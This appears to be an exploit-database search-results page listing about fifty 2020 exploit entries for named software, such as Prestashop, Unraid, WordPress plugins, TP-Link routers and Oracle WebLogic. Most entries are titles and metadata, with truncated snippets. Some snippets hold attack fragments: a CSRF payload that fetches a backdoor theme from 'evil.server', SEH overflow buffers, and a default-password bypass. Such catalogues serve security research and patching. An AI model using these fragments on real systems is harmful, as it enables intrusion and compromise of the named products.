47904 matches found
Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow Unicode+SEH Exploit Author: Bobby Cooke Date: 2020-04-17 Vendor: Drive Software Company Vendor Site: http://www.drive-software.com Software Download: http://www.drive-software.com/download/ataclock.exe Tested On: Windows 10 - Pro 1909 x86...
Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Unraid 6.8.0 Auth Bypass PHP Code Execution', 'Description' = %q This module exploits two vulnerabilities affecting Unraid 6.8.0. An authenticati...
Centreon 19.10.5 - 'id' SQL Injection
Exploit Title: Centreon 19.10.5 - 'id' SQL Injection Date: 2020-04-19 Exploit Author: Basim alabdullah Vendor Homepage: https://www.centreon.com Software Link: https://download.centreon.com/ Version: v.19.10.5 Tested on: Centos 5 EXECUTIVE SUMMARY Centreon has come a long way from its early roots...
Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow SEH Exploit Author: bzyo Date: 2020-04-17 Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0 Vendor Homepage: http://www.rubomedical.com/ Version: 2.0 Software Link : http://www.rubomedical.com/download/index.php Tested Windows 7 SP...
Prestashop 1.7.6.4 - Cross-Site Request Forgery
This is totally a legit page. Just keep reading this for a minute : history.pushState'', '', '/' var target = "http://localhost"; //change this var adminurl = "/admin123ab45cd"; //change this var themeurl = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip...
Fork CMS 5.8.0 - Persistent Cross-Site Scripting
Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: https://www.fork-cms.com/download Software Link: https://github.com/forkcms/forkcms/pull/3073 CVE: N/A Document Title: =============== Fork CMS v5.8.0 - Multiple Persistent Web...
WordPress Plugin Simple File List 5.4 - Remote Code Execution
Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution Date: 2020-04-2019 Exploit Author: coiffeur Vendor Homepage: https://simplefilelist.com/ Software Link: https://wordpress.org/plugins/simple-file-list/ Version: Wordpress v5.4 Simple File List v4.2.2 import requests impo...
Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow SEH+ASLR bypass 3 bytes overwrite Date: 2020-04-17 Exploit Author: Cervoise Vendor Homepage: https://www.nsauditor.com/ Software Link: https://www.nsauditor.com/downloads/nsauditorsetup.exe Version: 3.2.1.0 and 3.0.28 Tested on: Windows...
Playable 9.18 iOS - Persistent Cross-Site Scripting
Title: Playable 9.18 iOS - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 CVE: N/A Document Title: =============== Playable v9.18 iOS - Multiple Web Vulnerabilities...
Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow SEH + DEP Date: 2020-04-15 Exploit Author: Bailey Belisario Tested On: Windows 7 Ultimate x64 Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easympegtodvd.exe Version: 1.7.11 Exploit Length: 1015 Byte...
Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
Exploit Title: Code Blocks 16.01 - Buffer Overflow SEH UNICODE Date: 2020-04-17 Exploit Author: T3jv1l Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe Software version: 16.01 buffer="A"536 buffer buffer+="\x61\x41" POPAD + Aligned...
TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: https://www.taotesting.com Software Link: https://www.taotesting.com/product/ CVE: N/A Document Title: =============== TAO Open Source Assessment Platform v3.3.0 RC02 -...
Nexus Repository Manager - Java EL Injection RCE (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Nexus Repository Manager Java EL Injection RCE', 'Description' = %q This module exploits a Java Expression Language EL injection in Nexus...
Cisco IP Phone 11.7 - Denial of service (PoC)
Exploit Title: Cisco IP Phone 11.7 - Denial of Service PoC Date: 2020-04-15 Exploit Author: Jacob Baines Vendor Homepage: https://www.cisco.com Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html Version: Before 11.71 Tested on: Cisco Wireless IP Pho...
TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'openssl' class MetasploitModule 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution', 'Description' = %q This module exploits a command injection...
PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PlaySMS index.php Unauthenticated Template Injection Code Execution', 'Description' = %q This module exploits a preauth Server-Side Template...
Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Pandora FMS Ping Authenticated Remote Code Execution', 'Description' = %q This module exploits a vulnerability found in Pandora FMS 7.0NG and...
Apache Solr - Remote Code Execution via Velocity Template (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' class MetasploitModule 'Apache Solr Remote Code Execution via Velocity Template', 'Description' = %q This module exploits a...
VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VMware Fusion USB Arbitrator Setuid Privilege Escalation', 'Description' = %q This exploits an improper use of setuid binaries within VMware Fusi...
DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' require 'openssl' require 'set' class MetasploitModule activetimeout payload handler is normally set up and started here but has be...
Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Liferay Portal Java Unmarshalling via JSONWS RCE', 'Description' = %q This module exploits a Java unmarshalling vulnerability via JSONWS in Lifer...
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ThinkPHP Multiple PHP Injection RCEs', 'Description' = %q This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web...
AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: http://www.app2pro.com Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 CVE: N/A Document Title: =============== AirDisk Pro v5.5.3 iOS -...
File Transfer iFamily 2.1 - Directory Traversal
Title: File Transfer iFamily 2.1 - Directory Traversal Author: Vulnerability Laboratory Date: 2020-04-15 Software Link: http://www.dedecms.com/products/dedecms/downloads/ CVE: N/A Document Title: =============== File Transfer iFamily v2.1 - Directory Traversal Vulnerability References Source:...
Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download CVE: N/A Document Title: =============== Macs Framework v1.14f CMS - Multiple Web Vulnerabilitie...
SeedDMS 5.1.18 - Persistent Cross-Site Scripting
Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: https://www.seeddms.org Software Link: https://www.seeddms.org/index.php?id=7 CVE: N/A Document Title: =============== SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities...
SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: http://dropouts.in/ Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 CVE: N/A Document Title: =============== SuperBackup v2.0.5 iOS - V...
DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor Link: http://www.dedecms.com Software Link: http://www.dedecms.com/products/dedecms/downloads/ CVE: N/A Document Title: =============== DedeCMS v7.5 SP2 - Multiple Persistent Web...
Pinger 1.0 - Remote Code Execution
Title: Pinger 1.0 - Remote Code Execution Date: 2020-04-13 Author: Milad Karimi Vendor Homepage: https://github.com/wcchandler/pinger Software Link: https://github.com/wcchandler/pinger Tested on: windows 10 , firefox Version: 1.0 CVE : N/A...
Xeroneit Library Management System 3.0 - 'category' SQL Injection
Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection Google Dork: "LMS v3.0 - Xerone IT " Date: 2020-04-09 Exploit Author: Sohel Yousef jellyfish security team Software Link: https://xeroneit.net/portfolio/library-management-system-lms Software Demo...
BlazeDVD 7.0.2 - Buffer Overflow (SEH)
Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow SEH Date: 2020-04-15 Exploit Author: areyou1or0 Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html Version: 7.0.2 Tested on: Windows 7 Pro x86 !/usr/bin/python file = "exploit.plf" offset ="A"612-4 nseh = "\xeb\x1e\x90\x90" seh...
WSO2 3.1.0 - Persistent Cross-Site Scripting
Title: WSO2 3.1.0 - Persistent Cross-Site Scripting Date: 2020-04-13 Author: raki ben hamouda Vendor: https://apim.docs.wso2.com Softwrare link: https://apim.docs.wso2.com/en/latest/ CVE: N/A Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 Technical Details &...
Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution Author: nu11secur1ty Date: 2020-03-31 Vendor: Oracle Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw12.2.1.4.0wlsDisk11of1.zip Exploit link:...
B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)
Exploit Title: B64dec 1.1.2 - Buffer Overflow SEH Overflow + Egg Hunter Date: 2020-04-13 Exploit Author: Andy Bowden Vendor Homepage: http://4mhz.de/b64dec.html Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip Version: Base64 Decoder 1.1.2 Tested on: Windows 10 x86 Instructions: R...
Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution Date: 2020-04-13 Exploit Author: Wadeek Hardware Version: EW-7438RPn-v3 Mini Firmware Version: 1.23 / 1.27 Vendor Homepage:...
MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection Google Dork: inurl:human.aspx intext:moveit Date: 2020-04-12 Exploit Authors: Aviv Beniash, Noam Moshe Vendor Homepage: https://www.ipswitch.com/ Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and...
Webtateas 2.0 - Arbitrary File Read
Exploit Title: Webtateas 2.0 - Arbitrary File Read Date: 2020-04-12 Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. Vendor Homepage: http://webtareas.sourceforge.net/general/home.php Software Link: http://webtareas.sourceforge.net/general/home.php Version:...
WSO2 3.1.0 - Arbitrary File Delete
Title: WSO2 3.1.0 - Arbitrary File Delete Date: 2020-04-12 Author: raki ben hamouda Vendor: https://apim.docs.wso2.com Softwrare link: https://apim.docs.wso2.com/en/latest/ CVE: N/A Document Title: =============== WOS2 API ManagerDelete Extension Arbitrary File DeletePath traversal CVE not assign...
TVT NVMS 1000 - Directory Traversal
Exploit Title: TVT NVMS 1000 - Directory Traversal Date: 2020-04-13 Exploit Author: Mohin Paramasivam Shad0wQu35t Vendor Homepage: http://en.tvt.net.cn/ Version : N/A Software Link : http://en.tvt.net.cn/products/188.html Original Author : Numan Türle CVE : CVE-2019-20085 import sys import reques...
Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow SEH Exploit Author: Bobby Cooke Date: 2020-04-11 Vendor: Drive Software Company Vendor Site: http://www.drive-software.com Software Download: http://www.drive-software.com/download/freeclock.exe Tested On:...
WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion
Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion Google Dork: N/A Date: 2020-04-13 Exploit Author: Daniel Monzón stark0de Vendor Homepage: http://davidlingren.com/ Software Link: https://wordpress.org/plugins/media-library-assistant/ Version: 2.81 Tested on:...
Huawei HG630 2 Router - Authentication Bypass
Title: Huawei HG630 2 Router - Authentication Bypass Date: 2020-04-13 Author: Eslam Medhat Vendor Homepage: www.huawei.com Version: HG630 V2 HardwareVersion: VER.B CVE: N/A POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of t...
AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-05-02 Vendor Homepage: https://www.celestialsoftware.net/ Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe Tested Version: 11.12 Vulnerability...
Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path Date: 2020-04-10 Exploit Author: MgThuraMoeMyint Vendor Homepage: https://windscribe.com Version: v1.83 Build 20 Tested on: Windows 10, version 1909 In windscribe v1.83 , there is a service via windscribe that every...
Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal Date: 2020-04-10 Exploit Author: Basim Alabdullah Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro3.10.1.iso/download Version: 3.10.1 Tested on: Debian8u2 Technical Details...
WordPress Plugin Helpful 2.4.11 - SQL Injection
Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin Version : 2.4.11 Software Link : https://wordpress.org/plugins/helpful/ Date of found: 10.04.2019 Author: Numan Türle core/Core.class.php // Ajax requests: pro addaction 'wpajaxhelpfulajaxpro', array $this, 'helpfulajaxpro' ; // set args for...
Django 3.0 - Cross-Site Request Forgery Token Bypass
Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass Date: 2020-04-08 Exploit Author: Spad Security Group Vendor Homepage: https://www.djangoproject.com/ Software Link: https://pypi.org/project/Django/ Version: 3.0 = Tested on: windows 10 Language: python3.8 t.me/SpadSec Spad...
Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service PoC Date: 2020-04-07 Exploit Author: Jacob Baines Vendor Homepage: https://amcrest.com/ Software Link: https://amcrest.com/firmwaredownloads Version: Many different versions due to number of Dahua/Amcrest/etc devices affected...
dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
Exploit Title: dnsmasq-utils 2.79-1 - 'dhcprelease' Denial of Service PoC Date: 2020-04-06 Exploit Author: Josue Encinar Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 Version: 2.79 Tested on: Ubuntu 18.04 from subprocess import Popen, PIPE data = "" bof = False for i in range...
ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-04-05 Vendor Homepage: https://www.emtec.com Software Link : http://www.emtec.com/downloads/zoc/zoc7255x64.exe Tested Version: 7.25.5 Vulnerability Type: Local Tested on OS: Windows 10...